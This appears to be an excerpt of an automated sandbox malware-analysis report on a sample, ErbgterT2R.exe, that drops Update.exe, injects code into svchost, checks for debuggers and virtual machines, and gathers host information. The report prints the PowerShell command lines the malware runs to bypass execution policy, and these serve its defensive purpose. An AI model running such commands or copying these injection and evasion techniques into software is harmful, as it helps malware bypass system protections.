                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Window / User API: threadDelayed 5686
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8262
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1199
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3916
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 477
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Dropped PE file which has not been started: C:\Users\Public\Bilite\360inst_install.exe
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7684 | Thread sleep time: -73000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7680 | Thread sleep time: -63000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5888 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7580 | Thread sleep count: 247 > 30
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4944 | Thread sleep count: 5686 > 30
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4944 | Thread sleep time: -56860s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 864 | Thread sleep count: 254 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232 | Thread sleep count: 8262 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064 | Thread sleep count: 1199 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep count: 3916 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476 | Thread sleep count: 477 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4284 | Thread sleep count: 269 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1244 | Thread sleep count: 264 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5828 | Thread sleep count: 121 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Thread sleep count: Count: 5686 delay: -10
Source: C:\Users\Public\Bilite\Axialis\Update.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, | 0_2_0040301A
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, | 0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_6C39F888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose, | 3_2_6C39F888
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_6C39F7D7 FindFirstFileExW, | 3_2_6C39F7D7
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034E80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, | 3_2_034E80F0
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034E7410 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, | 3_2_034E7410
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Thread delayed: delay time: 73000
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: 360inst_install.exe.0.dr | Binary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Update.exe, 00000003.00000003.2921395641.0000000000596000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3563071953.0000000000596000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | API call chain: ExitProcess graph end node | graph_3-70401
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_000215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_000215D0
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034F054D VirtualProtect ?,-00000001,00000104,? | 3_2_034F054D
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, | 0_2_00406D5D
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_00910AE4 mov eax, dword ptr fs:[00000030h] | 3_2_00910AE4
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_030400CD mov eax, dword ptr fs:[00000030h] | 3_2_030400CD
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034E6790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree, | 3_2_034E6790
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_00021A8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_00021A8F
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_000215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_000215D0
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_00021764 SetUnhandledExceptionFilter, | 3_2_00021764
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034EDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, | 3_2_034EDF10
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034EF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_034EF00A
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034F1F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_034F1F67
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_6C38C85A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_6C38C85A
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_6C393AAF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_6C393AAF
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_6C38C4ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_6C38C4ED
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_10006815
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_10008587
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_009167EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_009167EC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: 3_2_034E77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, | 3_2_034E77E0
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe | 3_2_034E77E0
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe | 3_2_034E77E0
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: Update.exe, 00000003.00000002.3564873344.0000000004691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager
Source: Update.exe, 00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2762477025.000000000466D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 minProgram Manager0
Source: Update.exe, 00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2921820628.0000000004691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 minProgram ManagerO
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Code function: 0_2_0040D72E cpuid | 0_2_0040D72E
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar, | 0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, | 3_2_034E5430
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: EnumSystemLocalesW, | 3_2_6C39CEBE
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW, | 3_2_6C3A682C
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 3_2_6C3A68D3
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW, | 3_2_6C3A69D9
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW, | 3_2_6C39C9C3
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 3_2_6C3A645A
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: EnumSystemLocalesW, | 3_2_6C3A66AD
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetLocaleInfoW, | 3_2_6C3A670C
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: EnumSystemLocalesW, | 3_2_6C3A67E1
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 3_2_6C3A616E
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Code function: EnumSystemLocalesW, | 3_2_6C3A63BF
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
